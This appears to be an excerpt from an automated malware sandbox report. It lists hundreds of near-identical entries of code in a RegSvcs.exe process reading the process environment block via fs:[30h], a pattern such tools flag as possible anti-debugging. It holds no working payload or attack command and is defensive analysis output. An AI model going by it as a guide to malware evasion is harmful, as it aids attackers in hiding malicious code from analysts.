                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA823B mov eax, dword ptr fs:[00000030h]7_2_00EA823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC03E9 mov eax, dword ptr fs:[00000030h]7_2_00EC03E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE63FF mov eax, dword ptr fs:[00000030h]7_2_00EE63FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE3F0 mov eax, dword ptr fs:[00000030h]7_2_00ECE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE3F0 mov eax, dword ptr fs:[00000030h]7_2_00ECE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE3F0 mov eax, dword ptr fs:[00000030h]7_2_00ECE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F543D4 mov eax, dword ptr fs:[00000030h]7_2_00F543D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F543D4 mov eax, dword ptr fs:[00000030h]7_2_00F543D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EBA3C0 mov eax, dword ptr fs:[00000030h]7_2_00EBA3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB83C0 mov eax, dword ptr fs:[00000030h]7_2_00EB83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB83C0 mov eax, dword ptr fs:[00000030h]7_2_00EB83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB83C0 mov eax, dword ptr fs:[00000030h]7_2_00EB83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB83C0 mov eax, dword ptr fs:[00000030h]7_2_00EB83C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E3DB mov eax, dword ptr fs:[00000030h]7_2_00F5E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E3DB mov eax, dword ptr fs:[00000030h]7_2_00F5E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E3DB mov ecx, dword ptr fs:[00000030h]7_2_00F5E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5E3DB mov eax, dword ptr fs:[00000030h]7_2_00F5E3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F363C0 mov eax, dword ptr fs:[00000030h]7_2_00F363C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6C3CD mov eax, dword ptr fs:[00000030h]7_2_00F6C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED438F mov eax, dword ptr fs:[00000030h]7_2_00ED438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED438F mov eax, dword ptr fs:[00000030h]7_2_00ED438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE388 mov eax, dword ptr fs:[00000030h]7_2_00EAE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE388 mov eax, dword ptr fs:[00000030h]7_2_00EAE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE388 mov eax, dword ptr fs:[00000030h]7_2_00EAE388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8397 mov eax, dword ptr fs:[00000030h]7_2_00EA8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8397 mov eax, dword ptr fs:[00000030h]7_2_00EA8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA8397 mov eax, dword ptr fs:[00000030h]7_2_00EA8397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F5437C mov eax, dword ptr fs:[00000030h]7_2_00F5437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7A352 mov eax, dword ptr fs:[00000030h]7_2_00F7A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F58350 mov ecx, dword ptr fs:[00000030h]7_2_00F58350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov eax, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov eax, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov eax, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov ecx, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov eax, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3035C mov eax, dword ptr fs:[00000030h]7_2_00F3035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F8634F mov eax, dword ptr fs:[00000030h]7_2_00F8634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F88324 mov eax, dword ptr fs:[00000030h]7_2_00F88324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F88324 mov ecx, dword ptr fs:[00000030h]7_2_00F88324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F88324 mov eax, dword ptr fs:[00000030h]7_2_00F88324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F88324 mov eax, dword ptr fs:[00000030h]7_2_00F88324
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA30B mov eax, dword ptr fs:[00000030h]7_2_00EEA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA30B mov eax, dword ptr fs:[00000030h]7_2_00EEA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA30B mov eax, dword ptr fs:[00000030h]7_2_00EEA30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAC310 mov ecx, dword ptr fs:[00000030h]7_2_00EAC310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED0310 mov ecx, dword ptr fs:[00000030h]7_2_00ED0310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB04E5 mov ecx, dword ptr fs:[00000030h]7_2_00EB04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB64AB mov eax, dword ptr fs:[00000030h]7_2_00EB64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3A4B0 mov eax, dword ptr fs:[00000030h]7_2_00F3A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE44B0 mov ecx, dword ptr fs:[00000030h]7_2_00EE44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6A49A mov eax, dword ptr fs:[00000030h]7_2_00F6A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F3C460 mov ecx, dword ptr fs:[00000030h]7_2_00F3C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDA470 mov eax, dword ptr fs:[00000030h]7_2_00EDA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDA470 mov eax, dword ptr fs:[00000030h]7_2_00EDA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDA470 mov eax, dword ptr fs:[00000030h]7_2_00EDA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F6A456 mov eax, dword ptr fs:[00000030h]7_2_00F6A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE443 mov eax, dword ptr fs:[00000030h]7_2_00EEE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EA645D mov eax, dword ptr fs:[00000030h]7_2_00EA645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED245A mov eax, dword ptr fs:[00000030h]7_2_00ED245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE420 mov eax, dword ptr fs:[00000030h]7_2_00EAE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE420 mov eax, dword ptr fs:[00000030h]7_2_00EAE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAE420 mov eax, dword ptr fs:[00000030h]7_2_00EAE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EAC427 mov eax, dword ptr fs:[00000030h]7_2_00EAC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F36420 mov eax, dword ptr fs:[00000030h]7_2_00F36420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE8402 mov eax, dword ptr fs:[00000030h]7_2_00EE8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE8402 mov eax, dword ptr fs:[00000030h]7_2_00EE8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE8402 mov eax, dword ptr fs:[00000030h]7_2_00EE8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEC5ED mov eax, dword ptr fs:[00000030h]7_2_00EEC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEC5ED mov eax, dword ptr fs:[00000030h]7_2_00EEC5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE5E7 mov eax, dword ptr fs:[00000030h]7_2_00EDE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE5E7 mov eax, dword ptr fs:[00000030h]7_2_00EDE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE5E7 mov eax, dword ptr fs:[00000030h]7_2_00EDE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE5E7 mov eax, dword ptr fs:[00000030h]7_2_00EDE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE5E7 mov eax, dword ptr fs:[00000030h]7_2_00EDE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE5E7 mov eax, dword ptr fs:[00000030h]7_2_00EDE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE5E7 mov eax, dword ptr fs:[00000030h]7_2_00EDE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE5E7 mov eax, dword ptr fs:[00000030h]7_2_00EDE5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB25E0 mov eax, dword ptr fs:[00000030h]7_2_00EB25E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE5CF mov eax, dword ptr fs:[00000030h]7_2_00EEE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE5CF mov eax, dword ptr fs:[00000030h]7_2_00EEE5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB65D0 mov eax, dword ptr fs:[00000030h]7_2_00EB65D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA5D0 mov eax, dword ptr fs:[00000030h]7_2_00EEA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA5D0 mov eax, dword ptr fs:[00000030h]7_2_00EEA5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F305A7 mov eax, dword ptr fs:[00000030h]7_2_00F305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F305A7 mov eax, dword ptr fs:[00000030h]7_2_00F305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F305A7 mov eax, dword ptr fs:[00000030h]7_2_00F305A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED45B1 mov eax, dword ptr fs:[00000030h]7_2_00ED45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED45B1 mov eax, dword ptr fs:[00000030h]7_2_00ED45B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE4588 mov eax, dword ptr fs:[00000030h]7_2_00EE4588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB2582 mov eax, dword ptr fs:[00000030h]7_2_00EB2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB2582 mov ecx, dword ptr fs:[00000030h]7_2_00EB2582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEE59C mov eax, dword ptr fs:[00000030h]7_2_00EEE59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE656A mov eax, dword ptr fs:[00000030h]7_2_00EE656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE656A mov eax, dword ptr fs:[00000030h]7_2_00EE656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE656A mov eax, dword ptr fs:[00000030h]7_2_00EE656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB8550 mov eax, dword ptr fs:[00000030h]7_2_00EB8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB8550 mov eax, dword ptr fs:[00000030h]7_2_00EB8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE53E mov eax, dword ptr fs:[00000030h]7_2_00EDE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE53E mov eax, dword ptr fs:[00000030h]7_2_00EDE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE53E mov eax, dword ptr fs:[00000030h]7_2_00EDE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE53E mov eax, dword ptr fs:[00000030h]7_2_00EDE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EDE53E mov eax, dword ptr fs:[00000030h]7_2_00EDE53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0535 mov eax, dword ptr fs:[00000030h]7_2_00EC0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0535 mov eax, dword ptr fs:[00000030h]7_2_00EC0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0535 mov eax, dword ptr fs:[00000030h]7_2_00EC0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0535 mov eax, dword ptr fs:[00000030h]7_2_00EC0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0535 mov eax, dword ptr fs:[00000030h]7_2_00EC0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC0535 mov eax, dword ptr fs:[00000030h]7_2_00EC0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F46500 mov eax, dword ptr fs:[00000030h]7_2_00F46500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84500 mov eax, dword ptr fs:[00000030h]7_2_00F84500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84500 mov eax, dword ptr fs:[00000030h]7_2_00F84500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84500 mov eax, dword ptr fs:[00000030h]7_2_00F84500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84500 mov eax, dword ptr fs:[00000030h]7_2_00F84500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84500 mov eax, dword ptr fs:[00000030h]7_2_00F84500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84500 mov eax, dword ptr fs:[00000030h]7_2_00F84500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F84500 mov eax, dword ptr fs:[00000030h]7_2_00F84500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E6F2 mov eax, dword ptr fs:[00000030h]7_2_00F2E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E6F2 mov eax, dword ptr fs:[00000030h]7_2_00F2E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E6F2 mov eax, dword ptr fs:[00000030h]7_2_00F2E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F2E6F2 mov eax, dword ptr fs:[00000030h]7_2_00F2E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F306F1 mov eax, dword ptr fs:[00000030h]7_2_00F306F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F306F1 mov eax, dword ptr fs:[00000030h]7_2_00F306F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA6C7 mov ebx, dword ptr fs:[00000030h]7_2_00EEA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA6C7 mov eax, dword ptr fs:[00000030h]7_2_00EEA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEC6A6 mov eax, dword ptr fs:[00000030h]7_2_00EEC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE66B0 mov eax, dword ptr fs:[00000030h]7_2_00EE66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB4690 mov eax, dword ptr fs:[00000030h]7_2_00EB4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB4690 mov eax, dword ptr fs:[00000030h]7_2_00EB4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA660 mov eax, dword ptr fs:[00000030h]7_2_00EEA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EEA660 mov eax, dword ptr fs:[00000030h]7_2_00EEA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7866E mov eax, dword ptr fs:[00000030h]7_2_00F7866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00F7866E mov eax, dword ptr fs:[00000030h]7_2_00F7866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE2674 mov eax, dword ptr fs:[00000030h]7_2_00EE2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECC640 mov eax, dword ptr fs:[00000030h]7_2_00ECC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EB262C mov eax, dword ptr fs:[00000030h]7_2_00EB262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ECE627 mov eax, dword ptr fs:[00000030h]7_2_00ECE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE6620 mov eax, dword ptr fs:[00000030h]7_2_00EE6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EE8620 mov eax, dword ptr fs:[00000030h]7_2_00EE8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC260B mov eax, dword ptr fs:[00000030h]7_2_00EC260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC260B mov eax, dword ptr fs:[00000030h]7_2_00EC260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC260B mov eax, dword ptr fs:[00000030h]7_2_00EC260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC260B mov eax, dword ptr fs:[00000030h]7_2_00EC260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC260B mov eax, dword ptr fs:[00000030h]7_2_00EC260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC260B mov eax, dword ptr fs:[00000030h]7_2_00EC260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EC260B mov eax, dword ptr fs:[00000030h]7_2_00EC260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00EF2619 mov eax, dword ptr fs:[00000030h]7_2_00EF2619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED27ED mov eax, dword ptr fs:[00000030h]7_2_00ED27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED27ED mov eax, dword ptr fs:[00000030h]7_2_00ED27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00ED27ED mov eax, dword ptr fs:[00000030h]7_2_00ED27ED
